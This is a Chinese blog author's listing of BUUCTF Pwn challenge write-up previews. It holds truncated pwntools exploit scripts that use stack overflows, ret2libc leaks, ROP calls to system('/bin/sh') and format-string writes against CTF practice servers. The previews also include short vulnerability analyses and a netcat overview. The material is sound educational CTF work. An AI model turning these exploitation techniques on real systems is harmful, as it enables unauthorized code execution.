![](https://img-blog.csdnimg.cn/20201014180756926.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
Pwn
餐桌上的猫
这个作者很懒,什么都没留下…
展开
-
BUUCTF-Pwn-ciscn_2019_es_2
题目截图例行检查原创 2022-04-04 17:02:46 · 420 阅读 · 0 评论 -
BUUCTF-Pwn-pwn2_sctf_2016
expfrom pwn import*from LibcSearcher import *elf=ELF('/home/lhb/桌面/pwn2_sctf_2016')p=remote('node4.buuoj.cn',27385) printf_plt=elf.plt['printf']printf_got=elf.got['printf']main=0x80485b8p.sendlineafter(b'read? ',b'-1')payload=b'a'*(0x2c+4)+p32(p原创 2022-03-25 23:32:31 · 200 阅读 · 0 评论 -
BUUCTF-Pwn-bjdctf_2020_babystack2
expfrom pwn import*p=remote('node4.buuoj.cn',26509) backdoor=0x0400726ret=0x40073ap.sendlineafter(b'name:\n',b'-1')payload=b'a'*(0x10+8)+p64(ret)+p64(backdoor)p.sendlineafter(b'name?\n',payload)p.interactive()原创 2022-03-25 22:40:06 · 128 阅读 · 0 评论 -
BUUCTF-Pwn-jarvisoj_fm
expfrom pwn import*p=remote('node4.buuoj.cn',27346) x_addr=0x804A02Cpayload=p32(x_addr)+b'%11$n'p.sendline(payload)p.interactive()原创 2022-03-25 21:35:17 · 2662 阅读 · 0 评论 -
BUUCTF-Pwn-bjdctf_2020_babyrop
expfrom pwn import*from LibcSearcher import *p=process('/home/lhb/桌面/bjdctf_2020_babyrop')elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop')p=remote('node4.buuoj.cn',27346) main=0x4006adpop_rdi_ret=0x400733puts_plt=elf.plt['puts']puts_got=elf.got['puts']原创 2022-03-25 21:18:18 · 359 阅读 · 0 评论 -
BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop
expfrom pwn import*from LibcSearcher import *elf=ELF('/home/lhb/桌面/2018_rop')p=remote('node4.buuoj.cn',26218) main=0x80484C6write_plt=elf.plt['write']write_got=elf.got['write']payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p3原创 2022-03-25 21:08:57 · 108 阅读 · 0 评论 -
BUUCTF-Pwn-ciscn_2019_ne_5
expfrom pwn import*elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5')p=remote('node4.buuoj.cn',28555) str_sh=0x80482EAsystem_plt=elf.plt['system']p.sendline(b'administrator')p.sendline(b'1')payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh)p.sendline(原创 2022-03-25 10:36:10 · 124 阅读 · 0 评论 -
BUUCTF-Pwn-not_the_same_3dsctf_2016
题目截图原创 2022-03-04 14:24:55 · 95 阅读 · 1 评论 -
BUUCTF-Pwn-ciscn_2019_en_2
题目截图原创 2022-03-04 13:35:41 · 119 阅读 · 0 评论 -
BUUCTF-Pwn-bjdctf_2020_babystack
题目截图原创 2022-03-04 13:07:39 · 104 阅读 · 0 评论 -
BUUCTF-Pwn-get_started_3dsctf_2016
题目截图原创 2022-03-04 12:35:55 · 144 阅读 · 0 评论 -
BUUCTF-Pwn-[OGeek2019]babyrop
题目截图检查文件信息开启了NX和Full RELOR用IDA打开,反汇编查看主函数查看函数sub_804871Fbuf[7]的大小为7个字节,而我们最多可以写入0x20个字节的数据,可以覆盖到v5,所以我们可以控制v5的值,在if判断中,如果buf中的字符串与s中的字符串不相同就会退出程序,但是v1控制strncmp函数比较的字符数,v1等于buf中字符串的长度,只要我们输入的数据以\0开始,v1就等于0,那么就可以绕过if判断查看函数sub_80487D0a1的值等于上一个函数中的原创 2022-02-16 16:19:18 · 2158 阅读 · 0 评论 -
BUUCTF-Pwn-jarvisoj_level2
题目截图检查文件信息,开启了NX用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用查看函数表存在system函数进入主函数反汇编查看进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshellexpfrom pwn import*r=remote('node4.buuoj.cn',28083) str_bin_sh=0x804a024call_system=0x8048原创 2022-02-15 12:13:09 · 2318 阅读 · 0 评论 -
BUUCTF-Pwn-ciscn_2019_n_8
题目截图检查文件信息,开了NX,Canary和PIE反汇编查看主函数,只要var[13]=17就可以getshell,值得注意的是使用了(_QWORD *)进行类型转换,所以比较时读取的是QWORD即4个字的数据,也就是8个字节expfrom pwn import*r=remote('node4.buuoj.cn',28850) payload=p32(1)*13+p64(17)r.sendlineafter(b'\n', payload)r.interactive() #开启交互原创 2022-02-15 10:12:20 · 251 阅读 · 0 评论 -
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
题目截图检查文件信息这是一个32位的程序,开启了NX和Canary用IDA打开查看找到来能getshell的代码反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell测试我们输入的内容在栈中的位置,是第10个expfrom pwn import*r=remote('node4.buuoj.cn',28850) addr=原创 2022-02-15 09:31:37 · 350 阅读 · 0 评论 -
BUUCTF-Pwn-ciscn_2019_c_1
题目截图检查一下文件信息开启了NX,64位的文件使用IDA打开按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串一番寻找也没有找到system函数查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手找到gets函数所在位置查看在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用双击进入查看调用函数运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码原创 2022-02-14 19:30:57 · 3551 阅读 · 2 评论 -
BUUCTF-Pwn-jarvisoj_level0
题目截图panyload=b’b’*(0x80+8)+p64(0x400596)原创 2022-02-12 14:15:35 · 330 阅读 · 0 评论 -
BUUCTF-Pwn-ciscn_2019_n_1
题目截图原创 2022-02-12 14:04:41 · 238 阅读 · 0 评论 -
BUUTF-Pwn-warmup_csaw_2016
题目截图原创 2022-02-12 13:53:05 · 403 阅读 · 0 评论 -
BUUCTF-Pwn-rip
题目截图使用IDA打开附件,反汇编为C语言找到两个函数可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问题,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186所以我们可以构造payload=‘a’*23+原创 2021-11-14 16:23:34 · 2794 阅读 · 0 评论 -
BUUCTF-Pwn-test_your_nc
题目截图从题目描述可以看出,要使用要nc(netcat)命令先了解一下netcat命令是什么官网:http://netcat.sourceforge.net/netcat是一款调试 TCP/UDP 网络连接的利器,常被称作网络调试的瑞士军刀nc 有以下功能:模拟 TCP 服务端模拟 TCP 客户端模拟 UDP 服务端模拟 UDP 客户端模拟 UNIX socket 服务端模拟 UNIX socket 客户端端口扫描传输文件将服务器 bash 暴露给远程客户端内网穿透,反向获取原创 2021-10-31 15:20:39 · 717 阅读 · 0 评论